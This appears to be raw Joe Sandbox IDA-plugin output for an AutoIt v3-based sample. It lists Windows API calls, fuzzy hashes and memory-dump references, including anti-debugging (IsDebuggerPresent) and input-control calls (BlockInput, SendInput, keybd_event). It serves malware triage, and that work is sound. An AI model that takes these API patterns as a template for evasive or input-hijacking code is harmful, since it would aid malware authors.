                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                          • String ID: %.3d$X64
                                                                                                                                                                                          • API String ID: 481472006-1077770165
                                                                                                                                                                                          • Opcode ID: a1475c196ceba8a42493815ff083cc6a765961afd708f93932265ea94867ad8e
                                                                                                                                                                                          • Instruction ID: 61aa0f4b9d092abaeb4b7cde21dd624ea77df503d3378260f93d9f5740dea4a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: a1475c196ceba8a42493815ff083cc6a765961afd708f93932265ea94867ad8e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13D012B1D48118D6CBD0A7909C48CBD737CBB18300F508466F90691010F72C99049721
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00762A8A
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00762A94
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00762AA1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                          • Opcode ID: 464898280ce6c9ed03ef235443484bda26bbceba945a3e46aabe159b733c5cee
                                                                                                                                                                                          • Instruction ID: ec49e768d6abc9e7ab3bce60e571f03ab44986bb9046136d23affbc29c5d572a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 464898280ce6c9ed03ef235443484bda26bbceba945a3e46aabe159b733c5cee
                                                                                                                                                                                          • Instruction Fuzzy Hash: F231D77490131C9BCB21DF64D9887DDBBB4AF08311F5081EAE80CA6251E7749F858F45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 0078E664
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                          • String ID: X64
                                                                                                                                                                                          • API String ID: 2645101109-893830106
                                                                                                                                                                                          • Opcode ID: 0c766f8bc8af17944d8969dd9ee1c340748c9e871cdfeff032cfec0d6da00968
                                                                                                                                                                                          • Instruction ID: 8a47ce53770355abd0985fcfc5c875b5f0e9929cd154259337cea812c906fa59
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c766f8bc8af17944d8969dd9ee1c340748c9e871cdfeff032cfec0d6da00968
                                                                                                                                                                                          • Instruction Fuzzy Hash: BFD0C9B480112DEACB90CB50EC88DD9737CBB04304F104665F106A2000D73895488B14
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007B52EE,?,?,00000035,?), ref: 007A4229
                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007B52EE,?,?,00000035,?), ref: 007A4239
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                                          • Opcode ID: e155da00fd4747a0c3fd31f79f6ec7cb5566fe7cf2a6159c8ddca72fcb989494
                                                                                                                                                                                          • Instruction ID: 214ebad95d153996cf17247d7ad002f58fca684e8699c1bd254f4610749c97cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: e155da00fd4747a0c3fd31f79f6ec7cb5566fe7cf2a6159c8ddca72fcb989494
                                                                                                                                                                                          • Instruction Fuzzy Hash: 63F0E531600228AAEB2016659C4DFEB766DFFC5761F000279F509D21C2D9B49D00C7B0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0079BC24
                                                                                                                                                                                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0079BC37
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InputSendkeybd_event
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3536248340-0
                                                                                                                                                                                          • Opcode ID: 7d6897165b82d4ed973f89f1faa145ee5650729ff8d252ffe2d58a288e25463a
                                                                                                                                                                                          • Instruction ID: ad2a0b1d8791f7db89716defa12a4061ba8b4e48686e40fdfd742cb55de2bfc5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d6897165b82d4ed973f89f1faa145ee5650729ff8d252ffe2d58a288e25463a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25F0497080024DABDB019FA0D805BAE7BB0EF04309F008019F951A5191D37D8611DBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • BlockInput.USER32(00000001), ref: 007AF51A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                                                          • Opcode ID: f71fe82f094cbb7b0ee6352c6d7b89150706d3e052660413eb66e8c1741232a2
                                                                                                                                                                                          • Instruction ID: 8808d9a2f6e83001b6865e13f56bcd098f3f09090736d700cfd0098618fcd0fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: f71fe82f094cbb7b0ee6352c6d7b89150706d3e052660413eb66e8c1741232a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: AFE048722006049FD710AF69D405E56F7D8AFA5761F008425F849D7352D674FD40CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0079EC95
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: mouse_event
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2434400541-0
                                                                                                                                                                                          • Opcode ID: 7347f9bd49c0cd74b92f46590e14114302900f09cc30bebf234b81cb54a2231e
                                                                                                                                                                                          • Instruction ID: a5e5b079b3757e5bb97bf2bcd90162988b840c19cdab346ad21db722c9fe41cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7347f9bd49c0cd74b92f46590e14114302900f09cc30bebf234b81cb54a2231e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F2D05EB61902007AEC1CCA3CBF2FF360A09E303741F80434DF182D5595E4CD9D409131
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0075075E), ref: 00750D4A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                          • Opcode ID: 8079450f721d922ef1119b08fb7de9f48db8f2c392583531dc387a29884c0a85
                                                                                                                                                                                          • Instruction ID: 8382a63a74488b25c10776207a40e698baac269b53b6897289aa1a7b004cd689
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8079450f721d922ef1119b08fb7de9f48db8f2c392583531dc387a29884c0a85
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 007B358D
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 007B35A0
                                                                                                                                                                                          • DestroyWindow.USER32 ref: 007B35AF
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 007B35CA
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 007B35D1
                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 007B3700
                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 007B370E
                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B3755
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 007B3761
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007B379D
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37BF
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37D2
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37DD
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37E6
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37F5
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B37FE
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B3805
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007B3810
                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B3822
                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,007D0C04,00000000), ref: 007B3838
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007B3848
                                                                                                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 007B386E
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 007B388D
                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B38AF
                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B3A9C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                                                                                                          • Opcode ID: daa3ad9e79a579060e903135351b8e149e872dbf334ddfb9ac9c98c14e6ab3d4
                                                                                                                                                                                          • Instruction ID: 11c6db82109f3fe7bc046448548865730e8332577435a3ecb3f0daeac9c21812
                                                                                                                                                                                          • Opcode Fuzzy Hash: daa3ad9e79a579060e903135351b8e149e872dbf334ddfb9ac9c98c14e6ab3d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29026B72900205EFDB24DF64CD89EAE7BB9FF48314F048158F915AB2A1DB78AD41CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 007C7B67
                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007C7B98
                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 007C7BA4
                                                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 007C7BBE
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 007C7BCD
                                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007C7BF8
                                                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 007C7C00
                                                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 007C7C07
                                                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 007C7C16
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 007C7C1D
                                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 007C7C68
                                                                                                                                                                                          • FillRect.USER32(?,?,?), ref: 007C7C9A
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C7CBC
                                                                                                                                                                                            • Part of subcall function 007C7E22: GetSysColor.USER32(00000012), ref: 007C7E5B
                                                                                                                                                                                            • Part of subcall function 007C7E22: SetTextColor.GDI32(?,007C7B2D), ref: 007C7E5F
                                                                                                                                                                                            • Part of subcall function 007C7E22: GetSysColorBrush.USER32(0000000F), ref: 007C7E75
                                                                                                                                                                                            • Part of subcall function 007C7E22: GetSysColor.USER32(0000000F), ref: 007C7E80
                                                                                                                                                                                            • Part of subcall function 007C7E22: GetSysColor.USER32(00000011), ref: 007C7E9D
                                                                                                                                                                                            • Part of subcall function 007C7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007C7EAB
                                                                                                                                                                                            • Part of subcall function 007C7E22: SelectObject.GDI32(?,00000000), ref: 007C7EBC
                                                                                                                                                                                            • Part of subcall function 007C7E22: SetBkColor.GDI32(?,?), ref: 007C7EC5
                                                                                                                                                                                            • Part of subcall function 007C7E22: SelectObject.GDI32(?,?), ref: 007C7ED2
                                                                                                                                                                                            • Part of subcall function 007C7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 007C7EF1
                                                                                                                                                                                            • Part of subcall function 007C7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007C7F08
                                                                                                                                                                                            • Part of subcall function 007C7E22: GetWindowLongW.USER32(?,000000F0), ref: 007C7F15
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4124339563-0
                                                                                                                                                                                          • Opcode ID: 6d91a6cf84be321069ab9799939c5c0a4da64614c226adbb12d97423c6b6c774
                                                                                                                                                                                          • Instruction ID: b6c1809e185c04c04ce8edc2ea8affaf2faee97eb939038b4c9f874b143b7dd0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d91a6cf84be321069ab9799939c5c0a4da64614c226adbb12d97423c6b6c774
                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A18D72008305AFC7259F64DC48E6BBBA9FF48320F148A2DF962961A0DB79DD44CF56
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(?,?), ref: 007316B4
                                                                                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00772B07
                                                                                                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00772B40
                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00772F85
                                                                                                                                                                                            • Part of subcall function 00731802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00731488,?,00000000,?,?,?,?,0073145A,00000000,?), ref: 00731865
                                                                                                                                                                                          • SendMessageW.USER32(?,00001053), ref: 00772FC1
                                                                                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00772FD8
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00772FEE
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00772FF9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 2760611726-4108050209
                                                                                                                                                                                          • Opcode ID: f6a721bb9b99ad660f5e487af538fa40d4c50d7cf8b5992827ca69a0791e0c4b
                                                                                                                                                                                          • Instruction ID: 9101d17cb2dd8c294f128a10e37c82cb7b38a4380b69c1c99e27fca9213ef0bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6a721bb9b99ad660f5e487af538fa40d4c50d7cf8b5992827ca69a0791e0c4b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F129D30200241EFDB25CF14C859FA9BBE5FB44340F58C56DE4A99B262CB79EC92CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 007B319B
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007B32C7
                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007B3306
                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007B3316
                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 007B335D
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 007B3369
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 007B33B2
                                                                                                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007B33C1
                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 007B33D1
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007B33D5
                                                                                                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 007B33E5
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007B33EE
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 007B33F7
                                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007B3423
                                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 007B343A
                                                                                                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 007B347A
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007B348E
                                                                                                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 007B349F
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 007B34D4
                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 007B34DF
                                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007B34EA
                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 007B34F4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
